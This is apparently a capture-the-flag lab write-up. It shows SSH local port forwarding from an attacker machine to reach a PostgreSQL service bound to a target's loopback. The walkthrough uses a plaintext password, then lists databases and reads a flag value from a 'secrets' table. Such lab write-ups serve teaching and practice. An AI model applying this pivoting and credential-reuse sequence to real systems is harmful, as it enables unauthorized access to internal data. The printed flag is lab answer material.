LOCAL PORT FORWARDING

#
root@oco:~$ ssh christine@10.129.22.40 -L 31173:127.0.0.1:5432
 christine@10.129.22.40's password: funnel123#!#
 
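 * the ssh client (attackerMachine) establishes an encrypted connection
   to the remote SSH server (targetMachine) and then listens for incoming
   connections on local port 31173 on the attackerMachine.
    - when a client connects to that local port, the ssh client sends the
      connection through the tunnel, and the SSH server (targetMachine)
      opens it to 127.0.0.1:5432. the destination address is resolved on
      the targetMachine, so 127.0.0.1 here is the target's own loopback.
    - this allows the attackerMachine to access a service that listens only
      on the target's loopback (see 127.0.0.1:5432 in the ss output below)
      as if it were running on the local machine.
    - binding the database to 127.0.0.1 therefore does not isolate it from
      anyone who can log in over SSH while TCP forwarding is permitted
      (sshd_config: AllowTcpForwarding / PermitOpen).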
      
christine@funnel:~$ ss -tlpna
 State     Recv-Q  Send-Q  Local Address:Port   Peer Address:Port    Process
 LISTEN    0       4096    127.0.0.53%lo:53     0.0.0.0:*             
 LISTEN    0       128     0.0.0.0:22           0.0.0.0:*           
 LISTEN    0       4096    127.0.0.1:5432       0.0.0.0:*            
 LISTEN    0       4096    127.0.0.1:38617      0.0.0.0:*            
 ESTAB     0       0       10.129.22.40:22      10.10.14.215:46754  
 SYN-SENT  0       1       10.129.22.40:42680   8.8.8.8:53           
 LISTEN    0       32      *:21                 *:*                  
 LISTEN    0       128     [::]:22              [::]:*
#
root@oco:~$ psql -U christine -h localhost -p 31173
 Password for user christine: 
 psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
 Type "help" for help.

christine=# 

 * make sure to specify localhost with the -h option so psql goes through
   the tunnel created earlier with SSH (without -h, psql tries the local
   Unix socket instead), and port 31173 with the -p option,
   which is the port the tunnel is listening on.
   
christine=# \list
                                                   List of databases
   Name    |   Owner   | Encoding |  Collate   |   Ctype    | ICU Locale | Locale Provider |    Access privileges    
 -----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
 christine | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 postgres  | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 secrets   | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | 
 template0 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 template1 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 (5 rows)

 * this lists the existing databases
 
christine=# \connect secrets
 psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
 You are now connected to database "secrets" as user "christine".

 * this connects to the specified DB
 
secrets=# \dt 
          List of relations
 Schema | Name | Type  |   Owner   
 --------+------+-------+-----------
 public | flag | table | christine
 (1 row)

 * this lists the tables in the current database
 
secrets=# select * from flag;
              value               
 ----------------------------------
 cf277664b1771217d7006acdea006db1
 (1 row)
